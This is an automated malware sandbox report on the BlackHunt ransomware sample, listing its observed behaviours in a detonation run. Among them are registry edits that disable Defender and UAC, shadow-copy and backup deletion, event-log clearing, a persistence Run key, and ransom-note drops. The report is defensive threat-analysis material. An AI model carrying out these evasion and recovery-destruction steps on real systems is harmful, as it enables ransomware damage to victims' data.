Malware Analysis Report

2025-06-16 00:03

Sample ID 241106-ba9wkssbpb
Target BlackHunt2.exe
SHA256 ba011447038aab7f6b94cad29c2ac6405c1b8098dc65a94fb095af48422a56c9
Tags
defense_evasion discovery evasion execution impact persistence ransomware trojan
Score
10/10


Analysis Overview

Score
10/10

SHA256

ba011447038aab7f6b94cad29c2ac6405c1b8098dc65a94fb095af48422a56c9

Threat Level: Known bad

The file BlackHunt2.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution impact persistence ransomware trojan

Modifies Windows Defender Real-time Protection settings

UAC bypass

Deletes NTFS Change Journal

Clears Windows event logs

Modifies boot configuration data using bcdedit

Renames multiple (3392) files with added filename extension

Deletes shadow copies

Renames multiple (2874) files with added filename extension

Disables Task Manager via registry modification

Deletes backup catalog

Disables use of System Restore points

Deletes itself

Checks computer location settings

Adds Run key to start application

Checks whether UAC is enabled

Enumerates connected drives

Looks up external IP address via web service

Sets desktop wallpaper using registry

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Program crash

Unsigned PE

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

Runs ping.exe

Modifies registry class

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Interacts with shadow copies

Suspicious behavior: GetForegroundWindowSpam

System policy modification

Kills process with taskkill

Suspicious behavior: CmdExeWriteProcessMemorySpam

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-06 00:57

Signatures

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-11-06 00:57

Reported

2024-11-06 01:00

Platform

win7-20241023-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

Signatures

Deletes NTFS Change Journal

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\fsutil.exe N/A
N/A N/A C:\Windows\system32\fsutil.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (2874) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables use of System Restore points

evasion

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" C:\Windows\system32\reg.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\fsutil.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\fsutil.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_videoinset.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport.wmv C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pohnpei C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\mai\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\it.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\Common.fxh C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Vancouver C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server-15.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\pl\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Recife C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\lo\LC_MESSAGES\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Iqaluit C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vienna C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\it\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuching C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\am_ET\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Fortaleza C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-back-static.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\jaccess.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jvm.lib C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\PreviousMenuButtonIcon.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ceuta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\HST10 C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2920 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2976 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2976 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2976 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2920 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2956 wrote to memory of 2804 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2956 wrote to memory of 2804 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2956 wrote to memory of 2804 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2920 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2696 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2696 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2696 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2920 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2840 wrote to memory of 2788 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2840 wrote to memory of 2788 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2840 wrote to memory of 2788 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2920 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
